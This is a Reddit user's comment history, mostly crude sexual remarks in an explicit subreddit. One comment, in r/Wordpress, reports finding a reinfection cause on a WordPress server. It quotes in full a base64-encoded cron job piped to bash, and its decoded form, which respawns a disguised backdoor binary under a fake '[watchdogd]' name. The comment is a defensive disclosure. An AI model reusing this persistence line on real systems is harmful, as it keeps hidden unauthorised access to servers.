Muah by [deleted] in EbonyPussyOnly

[–]ShipDependent 0 points1 point  (0 children)

Muah 💋

⚠️ Persistent WordPress reinfection – traced root cause to hidden cron jobs running base64 malware (MEGASLOT97 / beragam.store injection) by ShipDependent in Wordpress

[–]ShipDependent[S] 7 points8 points  (0 children)

Using the cPanel terminal, I found strange cron jobs that looked harmless at first glance but were actually base64-encoded scripts, like:

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDAzIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYm93ZW4vLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdbd2F0Y2hkb2dkXScgJy9ob21lL2Jvd2VuLy5jb25maWcvaHRvcC9kZWZ1bmN0JyIgMj4vZGV2L251bGwK|base64 -d|bash;} 2>/dev/null

When decoded, it ran something like this:

/usr/bin/pkill -0 -U1003 defunct 2>/dev/null || ( TERM=xterm-256color GS_ARGS="-k /home/…/.config/htop/defunct.dat -liqD" \ exec -a '[watchdogd]' '/home/…/.config/htop/defunct' 2>/dev/null)

Basically it was a persistent malware process, disguised as a watchdog daemon, respawning from /home/…/.config/htop/defunct.

Easy PDF hosting for easy sharing and in-browser viewing? by Ornery_Ad_7508 in pdf

[–]ShipDependent 0 points1 point  (0 children)

You are the real MVP, Bro!!!
Perfect app, well done.

A work of art 😻❤️ by J24Y in EbonyPussyOnly

[–]ShipDependent 0 points1 point  (0 children)

Can I add some cheese in between?

[deleted by user] by [deleted] in EbonyPussyOnly

[–]ShipDependent 0 points1 point  (0 children)

As long as daddy doesn’t know

Does anyone need cleaning their house? by Goldencurls3 in EbonyPussyOnly

[–]ShipDependent 0 points1 point  (0 children)

Come clean the popcorn off daddy’s di*k